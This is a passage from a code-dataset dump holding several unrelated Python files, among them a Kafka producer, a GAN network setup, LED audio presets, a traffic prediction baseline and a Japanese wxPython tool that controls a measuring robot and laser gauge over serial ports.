client\n response = {'message': description}\n # encode response using jsonpickle\n response_pickled = jsonpickle.encode(response)\n\n return Response(response=response_pickled, status=200, mimetype=\"application/json\")\n\nif __name__ == '__main__':\n \n # start flask app\n app.run(debug=True, host=\"0.0.0.0\", port=5000)\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"559586385","text":"\"\"\" Kafka Producer\nUsage:\n consumer.py [--servers=] [--topic=] [--message=]\n consumer.py --version\n consumer.py (-h | --help)\n\nOptions:\n -h --help Show this screen\n --version Show version\n --servers= Servers separated by comma\n --topic= Topics name\n --message= Message string\n\"\"\"\nfrom kafka import KafkaProducer\nfrom docopt import docopt\n\n\nif __name__ == '__main__':\n arguments = docopt(__doc__, version='Kafka Producer v0.1')\n\n servers = None\n if arguments.has_key('--servers'):\n servers = arguments.get('--servers')\n\n topic = None\n if arguments.has_key('--topic'):\n topic = arguments.get('--topic')\n\n message = None\n if arguments.has_key('--message'):\n message = arguments.get('--message')\n\n producer = KafkaProducer(\n bootstrap_servers=servers\n )\n\n producer.send(topic, message)\n","sub_path":"tools/kafka_helper/producer.py","file_name":"producer.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"14643463","text":"from google.appengine.ext import db\nfrom google.appengine.api import memcache\nimport UserHandler\nimport datetime\nimport logging\n\nHOST_COOLDOWN = 60*5\nDEFAULT_EXPIRE = 60*60\n\ndef retrieveCache(key, model):\n data = memcache.get(key)\n if data is not None:\n return data\n else:\n data = model.get_by_key_name(key)\n memcache.add(key, data, time=DEFAULT_EXPIRE)\n return data\n\ndef storeCache(data, key):\n if not memcache.replace(key, data):\n memcache.add(key, data, time=DEFAULT_EXPIRE)\n return data.put()\n\ndef deleteData(data, key):\n memcache.delete(key)\n db.delete(data)\n\ndef markPlayerHostedGame(user_id):\n user = retrieveCache(user_id, UserHandler.User)\n user.last_hosted = datetime.datetime.now()\n storeCache(user, user_id)\n return user\n\ndef canPlayerHost(user_id):\n user = retrieveCache(user_id, UserHandler.User)\n if user.last_hosted is None:\n user.last_hosted = (datetime.datetime.now() - datetime.timedelta(seconds=HOST_COOLDOWN*2))\n storeCache(user, user_id)\n return (datetime.datetime.now() - user.last_hosted).seconds > HOST_COOLDOWN\n\ndef resetPlayerHost(user_id):\n user = retrieveCache(user_id, UserHandler.User)\n user.last_hosted = (datetime.datetime.now() - datetime.timedelta(seconds=HOST_COOLDOWN*2))\n storeCache(user, user_id)\n return user\n","sub_path":"cacheLib.py","file_name":"cacheLib.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"80023814","text":"import torch\r\nimport torch.nn as nn\r\nfrom torch.nn import init\r\nfrom models.generator import UnetGenerator\r\nfrom models.discriminator import SNResNetProjectionDiscriminator\r\n\r\ndef init_weights(net, init_type='normal', gain=0.02):\r\n def init_func(m):\r\n classname = m.__class__.__name__\r\n if hasattr(m, 'weight') and (classname.find('Conv') != -1 or classname.find('Linear') != -1):\r\n if init_type == 'normal':\r\n init.normal_(m.weight.data, 0.0, gain)\r\n elif init_type == 'xavier':\r\n init.xavier_normal_(m.weight.data, gain=gain)\r\n else:\r\n raise NotImplementedError('initialization method [%s] is not implemented' % init_type)\r\n if hasattr(m, 'bias') and m.bias is not None:\r\n init.constant_(m.bias.data, 0.0)\r\n elif classname.find('CategoricalConditionalBatchNorm2d') != -1:\r\n pass\r\n elif classname.find('BatchNorm2d') != -1:\r\n init.normal_(m.weight.data, 1.0, gain)\r\n init.constant_(m.bias.data, 0.0)\r\n\r\n print('initialize network with [{}]'.format(init_type))\r\n net.apply(init_func)\r\n\r\ndef init_net(net, init_type='normal', gain=0.02, gpu_ids=[]):\r\n if len(gpu_ids) > 0:\r\n net.cuda()\r\n if len(gpu_ids) > 1:\r\n net = nn.DataParallel(net, gpu_ids)\r\n init_weights(net, init_type=init_type, gain=gain)\r\n return net\r\n\r\n\r\ndef define_G(netG, input_nc, output_nc, num_class, init_type='xavier', gpu_ids=[]):\r\n if netG == 'unet_cbn':\r\n netG = UnetGenerator(input_nc, output_nc, num_class)\r\n else:\r\n raise NotImplementedError('Generator [{}] is not implemented.'.format(netG))\r\n\r\n return init_net(netG, init_type, gpu_ids=gpu_ids)\r\n\r\ndef define_D(netD, input_nc, ndf, num_class, init_type='xavier', gpu_ids=[]):\r\n if netD == 'snprojection':\r\n netD = SNResNetProjectionDiscriminator(input_nc, ndf, num_class)\r\n else:\r\n raise NotImplementedError('Discriminator [{}] is not implemented.'.format(netD))\r\n\r\n return init_net(netD, init_type, gpu_ids=gpu_ids)\r\n","sub_path":"models/networks.py","file_name":"networks.py","file_ext":"py","file_size_in_byte":2098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"245297360","text":"# Course: 100 Days of Code - The Complete Python Pro Bootcamp for 2022 (Udemy)\n# Instructor: Dr. Angela Yu\n# Day 23: Capstone Project - The Turtle Crossing\n# Project: The Turtle Crossing\n# Date: April 9, 2022\n# Author: Dan Wadleigh\n\nimport time\nfrom turtle import Screen\nfrom player import Player\nfrom car_manager import CarManager\nfrom scoreboard import Scoreboard\n\nscreen = Screen()\nscreen.setup(width=600, height=600)\nscreen.tracer(0)\n\nplayer = Player()\ncar_manager = CarManager()\nscoreboard = Scoreboard()\n\nscreen.listen()\nscreen.onkey(player.move, \"Up\")\n\ngame_is_on = True\nwhile game_is_on:\n time.sleep(0.1)\n screen.update()\n\n car_manager.create_car()\n car_manager.move_cars()\n\n # Detect collision with cars\n for car in car_manager.all_cars:\n if car.distance(player) < 20:\n game_is_on = False\n scoreboard.game_over()\n\n # Detect collision with end wall - complete Level\n if player.is_at_finish_line():\n player.reset_position()\n car_manager.level_up()\n scoreboard.increase_level()\n\nscreen.exitonclick()\n\n\n\n\n\n\n","sub_path":"20-learning/99-udemy-100-days-code-python-pro/day023/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"3191179","text":"import math\nimport numpy as np\nfrom collections import defaultdict\n\nfrom lib.raw_preset import RawPreset\nfrom lib.parameters import StringParameter, FloatParameter, HLSParameter, IntParameter\nfrom lib.color_fade import ColorFade\n\nclass PositionPulser(RawPreset):\n class AudioEmitterPulser(object):\n def __init__(self, audio_emitter, fade_colors, fade_steps):\n self.audio_emitter = audio_emitter\n self._fader = ColorFade(fade_colors, fade_steps)\n self.value = 0.0\n self.color = 0\n\n def setup(self):\n self.audio_emitter_pulsers = {}\n self.add_parameter(StringParameter('feature', 'vumeter'))\n self.feature = self.parameter('feature').get()\n self.add_parameter(FloatParameter('scale', 10.0))\n self.add_parameter(HLSParameter('color-start', (0.0, 0.5, 1.0)))\n self.add_parameter(HLSParameter('color-end', (1.0, 0.5, 1.0)))\n self.add_parameter(IntParameter('color-steps', 256))\n self.add_parameter(FloatParameter('color-speed', 10.0))\n\n def parameter_changed(self, parameter):\n self.feature = self.parameter('feature').get()\n\n def reset(self):\n self.pixel_locations = self.scene().get_all_pixel_locations()\n\n def draw(self, dt):\n x, y = self.pixel_locations.T\n\n # Make a blank color canvas for additive mixing.\n hues = np.zeros(x.shape, float)\n\n # Make every pixel dark.\n luminances = np.zeros(x.shape, float)\n\n scale = self.parameter('scale').get()\n color_speed = self.parameter('color-speed').get()\n for _, pulser in self.audio_emitter_pulsers.iteritems():\n position = pulser.audio_emitter.position()\n\n if not position:\n continue\n\n pulser_x, pulser_y, _ = position\n\n # For every pixel, get the vector between the pixel and this pulser.\n dx, dy = (self.pixel_locations - (pulser_x, pulser_y)).T\n\n # And make a column vector of the distances between every pixel and\n # this pulser.\n pixel_distances = np.sqrt(np.square(dx) + np.square(dy))\n\n # Select all pixels less than scale * feature-value from the pulser.\n selector = pixel_distances < pulser.value * scale\n\n # Color them with a color from the fader. Add the color so that\n # overlapping colors mix.\n hues[selector] += pulser._fader.get_color_wrapped(pulser.color)[0]\n\n # and illuminate them.\n luminances[selector] = 0.5\n\n # Increment the pulser's color ticker by the color-speed parameter.\n pulser.color += color_speed * dt\n\n self.setAllHLS(hues, luminances, 1)\n\n def on_feature(self, feature):\n if feature['feature'] != self.feature:\n return\n\n group = feature['group']\n audio_emitter = self._mixer.audio_emitter(group)\n\n pulser = self.audio_emitter_pulsers.get(group, None)\n if pulser is None:\n fade_colors = [self.parameter('color-start').get(),\n self.parameter('color-end').get(),\n self.parameter('color-start').get()]\n color_steps = self.parameter('color-steps').get()\n pulser = PositionPulser.AudioEmitterPulser(\n audio_emitter, fade_colors, color_steps)\n self.audio_emitter_pulsers[group] = pulser\n pulser.value = feature['value']\n\nclass PositionDonutParticles(RawPreset):\n \"\"\"Emits 'donut' particles from positions of AudioEmitters when the\n specified feature parameter goes high.\"\"\"\n\n class DonutParticle(object):\n def __init__(self, position, fade_colors, fade_steps):\n self.position = position\n self.distance = 0\n self.color = 0\n self._fader = ColorFade(fade_colors, fade_steps)\n self.alive = True\n\n def setup(self):\n self.particles = []\n self.max_distance = 0\n self.feature_value_triggered = defaultdict(lambda: False)\n self.add_parameter(StringParameter('feature', 'beat'))\n self.add_parameter(FloatParameter('speed', 100))\n self.add_parameter(FloatParameter('width', 5))\n self.add_parameter(HLSParameter('color-start', (0.0, 0.5, 1.0)))\n self.add_parameter(HLSParameter('color-end', (1.0, 0.5, 1.0)))\n self.add_parameter(IntParameter('color-steps', 256))\n self.add_parameter(FloatParameter('color-speed', 10.0))\n\n def parameter_changed(self, parameter):\n self.feature = self.parameter('feature').get()\n\n def reset(self):\n self.pixel_locations = self.scene().get_all_pixel_locations()\n extent_x, extent_y = self.scene().extents()\n self.max_distance = math.sqrt(extent_x ** 2 + extent_y ** 2)\n\n def draw(self, dt):\n x, y = self.pixel_locations.T\n\n hues = np.zeros(x.shape, float)\n luminances = np.zeros(x.shape, float)\n\n speed = self.parameter('speed').get()\n width = self.parameter('width').get()\n color_speed = self.parameter('color-speed').get()\n for particle in self.particles:\n particle_x, particle_y, _ = particle.position\n particle.distance += dt * speed\n\n # For every pixel, get the vector between the pixel and this particle.\n dx, dy = (self.pixel_locations - (particle_x, particle_y)).T\n\n # And make a column vector of the distances between every pixel and\n # this particle.\n pixel_distances = np.sqrt(np.square(dx) + np.square(dy))\n\n # Select all pixels less than width distance from current location\n # of the particle's width.\n selector = np.abs(pixel_distances - particle.distance) < width\n\n # Color them with a color from the fader. Add the color so that\n # overlapping colors mix.\n hues[selector] += particle._fader.get_color_wrapped(particle.color)[0]\n\n # and illuminate them.\n luminances[selector] = 0.5\n\n # Increment the pulser's color ticker by the color-speed parameter.\n particle.color += color_speed * dt\n\n if particle.distance > self.max_distance:\n particle.alive = False\n\n self.particles = filter(lambda particle: particle.alive, self.particles)\n\n self.setAllHLS(hues, luminances, 1)\n\n def on_feature(self, feature):\n if feature['feature'] != self.feature:\n return\n\n feature_value = feature['value']\n\n group = feature['group']\n audio_emitter = self._mixer.audio_emitter(group)\n\n if not feature_value:\n self.feature_value_triggered[group] = False\n return\n\n # We already processed this feature.\n if self.feature_value_triggered[group]:\n return\n\n position = audio_emitter.position()\n if position is None:\n return\n\n fade_colors = [self.parameter('color-start').get(),\n self.parameter('color-end').get(),\n self.parameter('color-start').get()]\n color_steps = self.parameter('color-steps').get()\n\n self.particles.append(PositionDonutParticles.DonutParticle(\n position, fade_colors, color_steps))\n self.feature_value_triggered[group] = True\n","sub_path":"presets/beat.py","file_name":"beat.py","file_ext":"py","file_size_in_byte":7349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"410840147","text":"from datetime import datetime\n\nimport pandas as pd\n\nfrom misc import TravelTimeSubmission as submission, get_traffic as traffic\n\n\ndef from_index_to_prediction_day(day, h):\n if day > 0:\n start = datetime(2016, 10, 24 + day, h[0][0], h[0][1], 0)\n end = datetime(2016, 10, 24 + day, h[1][0], h[1][1], 0)\n else: #monday (0) is the 31.10.2016\n start = datetime(2016, 10, 31 + day, h[0][0], h[0][1], 0)\n end = datetime(2016, 10, 31 + day, h[1][0], h[1][1], 0)\n return \"[\" + str(start) + \",\" + str(end) + \")\"\n\n#we are interested in all weekdays\nweekdays = [0, 1, 2, 3, 4, 5, 6]\n\n# all 20 min windows\ntimes = [[(8, 00), (8, 20)], [(8, 20), (8, 40)], [(8, 40), (9, 00)], [(9, 00), (9, 20)], [(9, 20), (9, 40)],[(9, 40), (10, 00)],\n [(17, 00), (17, 20)], [(17, 20), (17, 40)], [(17, 40), (18, 00)], [(18, 00), (18, 20)], [(18, 20), (18, 40)],[(18, 40), (19, 00)]]\n\n# the result panda data frame\ndfResult = pd.DataFrame(columns=[\"intersection_id\", \"tollgate_id\", \"avg_travel_time\", \"time_window\"])\n\n# iterate over all weekday - timeWindow pairs\nfor day in weekdays:\n for hours in times:\n # calculate for each timewindow the avg_travel_time based on the data in this time window\n df2 = traffic.get_traffic([day], [[(hours[0][0], hours[0][1]), (hours[1][0], hours[1][1])]]).groupby(['intersection_id', 'tollgate_id'])[\n 'travel_time'].mean().reset_index(name=\"avg_travel_time\")\n df3 = pd.DataFrame(df2, columns=[\"intersection_id\", \"tollgate_id\", \"avg_travel_time\", \"time_window\"])\n # add the time window column to the dataframe\n df3[\"time_window\"] = from_index_to_prediction_day(day, hours)\n # add the time window data to the result data frame\n dfResult = pd.concat([dfResult, df3], axis=0, ignore_index=1)\n\ndfResult = dfResult[[\"intersection_id\", \"tollgate_id\", \"avg_travel_time\", \"time_window\"]]\nsubmission.TravelTimeSubmission.save_df_travel_time_submission(submission.TravelTimeSubmission, dfResult)\n\n","sub_path":"python/traffic-prediction/src/baseline/Last3MonthsSubmission.py","file_name":"Last3MonthsSubmission.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"204842274","text":"# Author - Nilesh D\n# December 14 - A Wordplay with Vowels and Consonants\n\n\ndef subString(s, n):\n vowel = ['a', 'e', 'i', 'o', 'u']\n scoreA = scoreB = 0\n for i in range(n):\n for len in range(i+1, n+1):\n subsStr = s[i: len]\n if subsStr[0] in vowel:\n scoreA += 1\n else:\n scoreB += 1\n if scoreA > scoreB:\n print(\"The winner is A with\", scoreA, \"points\")\n else:\n print(\"The winner is B with\", scoreB, \"points.\")\n\n\ns = input(\"Enter string: \")\nsubString(s, len(s))\n","sub_path":"December-14/python_Nilesh2000.py","file_name":"python_Nilesh2000.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"132373517","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n\n# 芯金測定を行うためのプログラム\n# $Id: shaft_measure.py,v 1.3 2007/10/23 08:40:06 ishi Exp ishi $\n\nmsg = \"\"\"このプログラムは、\nキーエンスのレーザー寸法測定器LS-5000,LS-5120と\nヤマハ発動機の単軸ロボットFLIP LT-850とを\nRS232Cを介してコントロールし、管挽き芯金類の寸法測定を簡便に行うためのものです。\nプログラムはpythonを使ってかかれており、\nwxPython-2.6以上,python2.4,pySerial-2.2を前提としています。\n\nロボットLT-850はIO-DATA製USB-Serial変換器USB-RSAQ2を介して接続し、\nレーザー測定器LS-5000はシリアルポートの2番に接続するのを前提にしてあります。\n\nロボットの接続はクロスケーブルを使う点に注意。\nレーザーの方は専用のケーブルOP-96368とコネクタOP-96369が必要です。\n\nまた、実行するユーザーはuucpグループに登録しておかないと、/dev/tty*にアクセス出来ません。\n\nレーザー測定器の設定は本体を操作して行ってください。\nプログラムからの設定の読み書きがバイナリコードで一括でしか行えない上、その仕様が取説に載っていなかったからです。\n\n測定時は、ロボットを所定の位置に動かす度に、1秒程度静止するのが望ましいでしょう。\nロボット設定画面の静止時間でそれを設定してください。\n\npython shaft_measure.pyとして実行します。\npython \"shaft_measure.py -I\" とすると、最初にロボットを強制原点復帰して実行します。\nロボットのコントローラースイッチをいれた直後などで、プログラムが動作しないときに試��と良いでしょう。\n\n2007/08/01 石崎由宣\n\"\"\"\n\nimport sys,os\nimport time\nimport serial\nimport wx\nfrom wx import xrc\nimport wx.grid as grid\n\n######################################################################\n# global data\n######################################################################\nresfile = os.getcwd() + \"/shaft_measure.xrc\"\n\nrobotPort = None\nlaserPort = None\n\n######################################################################\n# robot handler\n######################################################################\nclass MyRobotControler:\n def __init__(self,settings = None, parent = None ):\n self.setParent(parent)\n self.setSettings(settings)\n\n def setParent(self,parent):\n self.parent = parent\n \n def setSettings(self,settings):\n self.settings = settings\n if settings == None:\n self.settings = {'RobotSpeed' : \"20\"}\n\n def setKey( self,key,string ):\n self.settings[key] = str(string)\n\n def getKey( self,key ):\n if self.settings.has_key(key):\n return self.settings[key]\n else:\n return \"\"\n \n def moveRobot( self,x = '0.0',speed = '' ):\n if robotPort != None and robotPort.isOpen():\n if len(speed) :\n ss = speed\n else:\n ss = self.settings['RobotSpeed']\n \n s = \"@MOVD \" + str(x) + \",\" + ss + \"\\r\"\n robotPort.write(s)\n ans = robotPort.readlines()\n return ans\n else:\n d = wx.MessageDialog(self.parent,\"ロボットへのRS232Cポートが開かれていません。\",\"警告\",wx.OK|wx.ICON_WARNING)\n d.ShowModal()\n d.Destroy()\n return\n\n# this is global item\ndefaultSetting = {\n 'RobotSpeed': '20','RobotX0': '0.0', 'RobotSpan':'500.0', 'RobotKizami': '2.0','RobotWait': '3.0','RobotStop': '1.0',\n }\ntheControler = MyRobotControler(defaultSetting)\n \n######################################################################\n# MyRobotRefPntSetDialog\n######################################################################\nclass MyRobotRefPntSetDialog(wx.Dialog):\n def __init__(self,parent):\n d = wx.PreDialog()\n res = xrc.XmlResource(resfile)\n res.LoadOnDialog(d,parent,\"robotRefPntDialog\")\n self.PostCreate(d)\n\n self.curX0 = xrc.XRCCTRL(self,\"txtCurX0\")\n self.txtRobotSpan = xrc.XRCCTRL(self,\"txtRobotSpan\")\n self.txtRobotKizami = xrc.XRCCTRL(self,\"txtRobotKizami\")\n self.txtRobotSpeed = xrc.XRCCTRL(self,\"txtRobotSpeed\")\n self.txtRobotWait = xrc.XRCCTRL(self,\"txtRobotWait\")\n self.txtRobotStop = xrc.XRCCTRL(self,\"txtRobotStop\")\n \n self.robotPos = xrc.XRCCTRL(self,\"txtRobotPos\")\n self.spnButton = xrc.XRCCTRL(self,\"spnRobotPos\")\n self.robotStep = xrc.XRCCTRL(self,\"txtRobotStep\")\n self.laserVal = xrc.XRCCTRL(self,\"txtLaserVal\")\n\n # 現在の設定を反映させる\n self.curX0.SetValue( theControler.getKey('RobotX0') )\n self.txtRobotSpan.SetValue( theControler.getKey('RobotSpan') )\n self.txtRobotKizami.SetValue( theControler.getKey('RobotKizami') )\n self.txtRobotSpeed.SetValue( theControler.getKey('RobotSpeed') )\n self.txtRobotWait.SetValue( theControler.getKey('RobotWait') )\n self.txtRobotStop.SetValue( theControler.getKey('RobotStop'))\n \n # ロボットの現在位置を反映\n robotPort.write(\"@?POS\\r\")\n for s in robotPort.readlines():\n s2 = s.rstrip()\n if s2 == \"NG\" or s2 == \"OK\" or s.find(\"%\") >= 0 :\n continue\n else:\n v = float(s2)\n self.robotPos.SetValue(str(v))\n break \n \n self.Bind(wx.EVT_BUTTON, self.OnCancel, id = xrc.XRCID(\"wxID_CANCEL\"))\n self.Bind(wx.EVT_BUTTON, self.OnRobotReset, id = xrc.XRCID(\"btnReset\"))\n self.Bind(wx.EVT_BUTTON, self.OnRobotGo, id = xrc.XRCID(\"btnRobotGo\"))\n self.Bind(wx.EVT_BUTTON, self.OnSetRef, id = xrc.XRCID(\"btnSetRef\"))\n\n self.Bind(wx.EVT_SPIN_UP, self.OnSpinUp, self.spnButton )\n self.Bind(wx.EVT_SPIN_DOWN, self.OnSpinDown, self.spnButton )\n \n self.txtRobotSpan.SetFocus()\n\n # functions\n def OnSpinUp(self,evt):\n dx = float( self.robotStep.GetValue() )\n x = float( self.robotPos.GetValue() )\n x += dx\n self.robotPos.SetValue( str(x) )\n \n def OnSpinDown(self,evt):\n dx = float( self.robotStep.GetValue() )\n x = float( self.robotPos.GetValue() )\n x -= dx\n self.robotPos.SetValue( str(x) )\n\n def OnCancel(self,evt):\n self.EndModal(wx.ID_CANCEL)\n \n def OnSetRef(self,evt):\n sp = float(self.txtRobotSpan.GetValue())\n x0 = float(self.robotPos.GetValue())\n if sp > x0 :\n md = wx.MessageDialog(self,\"ロボットの測定範囲は設定した原点(現在位置)よりも大きくなくてはなりません。\",\n \"警告\",wx.OK|wx.ICON_WARNING )\n md.ShowModal()\n md.Destroy()\n else:\n theControler.setKey('RobotSpan',sp)\n theControler.setKey('RobotKizami',self.txtRobotKizami.GetValue())\n theControler.setKey('RobotSpeed',self.txtRobotSpeed.GetValue())\n theControler.setKey('RobotWait',self.txtRobotWait.GetValue())\n theControler.setKey('RobotStop',self.txtRobotStop.GetValue())\n theControler.setKey('RobotX0',x0)\n\n self.EndModal(wx.ID_OK)\n\n def OnRobotGo(self,evt):\n \"ロボットを指定位置まで動かし、レーザの読みを表示する\"\n theControler.moveRobot(self.robotPos.GetValue(),self.txtRobotSpeed.GetValue())\n # レーザーの読み\n st = float(self.txtRobotStop.GetValue())\n time.sleep( st )\n laserPort.write(\"M1\\r\")\n vs = laserPort.readline()\n if vs.find(\"-\") >=0:\n self.laserVal.SetValue( vs )\n else:\n v = float(vs)\n self.laserVal.SetValue( str(v) )\n \n def OnRobotReset(self,evt):\n \"ロボットを現在の原点位置に移動する\"\n s = self.curX0.GetValue()\n self.robotPos.SetValue(s)\n theControler.moveRobot(s,self.txtRobotSpeed.GetValue() )\n \n # レーザーの読み\n st = float(self.txtRobotStop.GetValue())\n time.sleep( st )\n laserPort.write(\"M1\\r\")\n vs = laserPort.readline()\n if vs.find(\"-\") >=0:\n self.laserVal.SetValue( vs )\n else:\n v = float(vs)\n self.laserVal.SetValue( str(v) )\n\n def GetRobotX0(self):\n return self.robotPos.GetValue()\n \n######################################################################\n# MyRS232CSettingDlg\n######################################################################\nclass MyRS232CSettingDlg(wx.Dialog):\n def __init__(self,parent):\n d = wx.PreDialog()\n res = xrc.XmlResource(resfile)\n res.LoadOnDialog(d,parent,\"rs232cSettingDlg\")\n self.PostCreate(d)\n\n #self.Bind(wx.EVT_BUTTON, self.OnCancel, id = xrc.XRCID(\"wxID_CANCEL\"))\n self.Bind(wx.EVT_BUTTON, self.OnOK, id = xrc.XRCID(\"wxID_OK\"))\n\n self.txtRobotTimeout = xrc.XRCCTRL(self,\"txtRobotTimeout\")\n self.chRobotPort = xrc.XRCCTRL(self,\"chRobotPort\")\n self.chLaserPort = xrc.XRCCTRL(self,\"chLaserPort\")\n\n def OnOK(self,evt):\n self.EndModal(wx.ID_OK)\n\n# Cancelは出来ないようにした\n# def OnCancel(self,evt):\n# self.EndModal(wx.ID_CANCEL)\n\n def GetPortSettings(self):\n sts = {}\n\n sts['RobotTimeout'] = float(self.txtRobotTimeout.GetValue())\n\n s = self.chRobotPort.GetString(self.chRobotPort.GetCurrentSelection())\n if s.find('USB') >= 0 :\n sts['RobotPort'] = \"/dev/ttyUSB0\"\n else:\n sts['RobotPort'] = \"/dev/ttyS1\"\n\n\n s = self.chLaserPort.GetString(self.chLaserPort.GetCurrentSelection())\n if s.find('USB') >= 0 :\n sts['LaserPort'] = \"/dev/ttyUSB0\"\n else:\n sts['LaserPort'] = \"/dev/ttyS1\"\n\n if sts['LaserPort'] == sts['RobotPort']:\n if sts['LaserPort'].find('USB') >= 0 :\n sts['LaserPort'] = '/dev/ttyS1'\n else:\n sts['LaserPort'] = '/dev/ttyUSB0'\n \n msg = \"レーザー測定器とロボットのポートが重複しています。\\n\"\n msg += \"ロボットの設定を優先し、ロボットのポートを\"\n msg += sts['RobotPort']\n msg += \"に, レーザーを\"\n msg += sts['LaserPort']\n msg += \"にしました。\"\n\n dlg = wx.MessageDialog(self, msg, 'Cation', wx.OK|wx.ICON_INFORMATION )\n dlg.ShowModal()\n dlg.Destroy()\n\n return sts\n\n######################################################################\n# MyMeasureDialog\n######################################################################\nclass MyMeasureDialog(wx.Dialog):\n def __init__(self,parent,target):\n # targetにはMyFrameのGridを入れる\n self.grid = target\n self.count = 0\n \n d = wx.PreDialog()\n res = xrc.XmlResource(resfile)\n res.LoadOnDialog(d,parent,\"measureDlg\")\n self.PostCreate(d)\n\n self.curPos = xrc.XRCCTRL(self,\"txtCurPos\")\n self.curAbsPos = xrc.XRCCTRL(self,\"txtCurAbsPos\")\n self.endPos = xrc.XRCCTRL(self,\"txtEndPos\")\n self.endAbsPos = xrc.XRCCTRL(self,\"txtEndAbsPos\")\n self.gauge = xrc.XRCCTRL(self,\"gauge\")\n self.laserVal = xrc.XRCCTRL(self,\"txtLaserValue\")\n \n self.Bind(wx.EVT_BUTTON, self.OnCancel,id = xrc.XRCID(\"wxID_CANCEL\"))\n\n # use timer\n self.Bind(wx.EVT_TIMER, self.OnTimer)\n self.timer = wx.Timer(self)\n ms = float( theControler.getKey('RobotWait') ) * 1000 \n self.timer.Start( ms ) \n\n # setup every controls\n self.curX = 0.0\n self.offsetX = float( theControler.getKey('RobotX0') )\n self.endX = float(theControler.getKey('RobotSpan'))\n self.deltaX = float(theControler.getKey('RobotKizami'))\n\n self.curAbsX = self.curX + self.offsetX\n self.endAbsX = self.offsetX - self.endX # 方向に注意\n \n self.curPos.SetValue( str(self.curX))\n self.curAbsPos.SetValue( str( self.curAbsX ))\n self.endPos.SetValue( str(self.endX) )\n self.endAbsPos.SetValue( str(self.endAbsX))\n\n self.gauge.SetValue(0) # max is 100 \n\n # hold robot stop time\n self.stoptime = float( theControler.getKey('RobotStop') )\n\n # error handling ?\n self.grid.ClearGrid()\n self.grid.SelectBlock(0,0,0,0)\n \n def OnCancel(self,evt):\n self.timer.Stop()\n self.EndModal(wx.ID_CANCEL)\n\n def OnTimer(self,evt):\n #まず測定\n theControler.moveRobot( str(self.curAbsX) )\n time.sleep(self.stoptime)\n # read Laser here\n laserPort.write(\"M1\\r\")\n v = (laserPort.readline()).rstrip()\n self.laserVal.SetValue( v )\n self.grid.SetCellValue(self.count,3, v.replace(\" \",\"\") ) #スペースは取る\n\n self.grid.SetCellValue(self.count,0, str(self.count+1) )\n self.grid.SetCellValue(self.count,1, str(self.curX) )\n self.grid.SetCellValue(self.count,2, str(self.curAbsX) )\n self.grid.SelectRow(self.count)\n \n self.grid.MakeCellVisible(self.count,0)\n \n # show info\n self.curPos.SetValue( str(self.curX))\n self.curAbsPos.SetValue( str(self.curAbsX))\n self.gauge.SetValue( int( self.curX * 100 / self.endX ) )\n\n # for next measure\n self.curX += self.deltaX\n self.curAbsX = self.offsetX - self.curX # 方向に注意\n self.count += 1 \n if self.curX > self.endX :\n self.OnCancel(None)\n \n######################################################################\n# MyFrame\n######################################################################\nclass MyFrame(wx.Frame):\n def __init__(self):\n p = wx.PreFrame()\n res = xrc.XmlResource(resfile)\n res.LoadOnFrame(p,None,\"topFrame\")\n self.PostCreate(p)\n\n self.robotX0 = \"0.0\"\n\n # menu\n self.Bind(wx.EVT_MENU, self.OnSaveAs, id = xrc.XRCID(\"wxID_SAVEAS\"))\n self.Bind(wx.EVT_MENU, self.OnExit, id = xrc.XRCID(\"wxID_EXIT\"))\n self.Bind(wx.EVT_MENU, self.OnRS232CSetting, id = xrc.XRCID(\"mnRS232CSetting\"))\n self.Bind(wx.EVT_MENU, self.OnRobotRefPnt, id = xrc.XRCID(\"mnRobotRefPntSet\"))\n self.Bind(wx.EVT_MENU, self.OnRobotOrg, id = xrc.XRCID(\"mnRobotOrg\"))\n self.Bind(wx.EVT_MENU, self.OnMeasure, id = xrc.XRCID(\"mnMeasure\"))\n \n # set static text\n #self.stText = xrc.XRCCTRL(self, \"txtMain\")\n self.stText = wx.TextCtrl(self,style = wx.TE_READONLY|wx.TE_MULTILINE, size=wx.Size(600,150))\n self.stText.SetValue(msg)\n\n # grid\n self.grid = grid.Grid(self)\n self.grid.CreateGrid(2048,4) #少な過ぎる?\n self.grid.SetColLabelValue(0,\"番号\")\n self.grid.SetColLabelValue(1,\"位置\")\n self.grid.SetColLabelValue(2,\"ロボット座標\")\n self.grid.SetColLabelValue(3,\"レーザー値\")\n \n # add to sizer\n self.sizer = wx.BoxSizer(wx.VERTICAL)\n self.sizer.Add(self.stText,0,wx.EXPAND)\n self.sizer.Add(self.grid,1,wx.EXPAND)\n \n self.SetSizer(self.sizer)\n self.sizer.Fit(self)\n \n self.grid.SetFocus() #キーボードイベントをすぐ受け取るように。\n\n # コントローラインスタンスにわたしを登録\n theControler.setParent(self)\n\n ###################################################\n # functions\n def OnRS232CSetting(self,evnt = None):\n \"\"\"RS232C設定ダイアログを開く\"\"\"\n dlg = MyRS232CSettingDlg(self)\n ans = dlg.ShowModal()\n if ans == wx.ID_OK:\n #実はいつもここに来る。\n self.portSet = dlg.GetPortSettings()\n\n # RS232Cポートを開く\n global robotPort\n global laserPort\n if robotPort and robotPort.isOpen():\n robotPort.close()\n if laserPort and laserPort.isOpen():\n laserPort.close()\n\n # timeout を少し長くとる\n robotPort = serial.Serial(self.portSet['RobotPort'],baudrate=9600,parity='O',\n timeout = self.portSet['RobotTimeout'])\n laserPort = serial.Serial(self.portSet['LaserPort'],baudrate=9600,parity='N',timeout=0.5)\n \n dlg.Destroy()\n \n def OnExit(self,evnt):\n md = 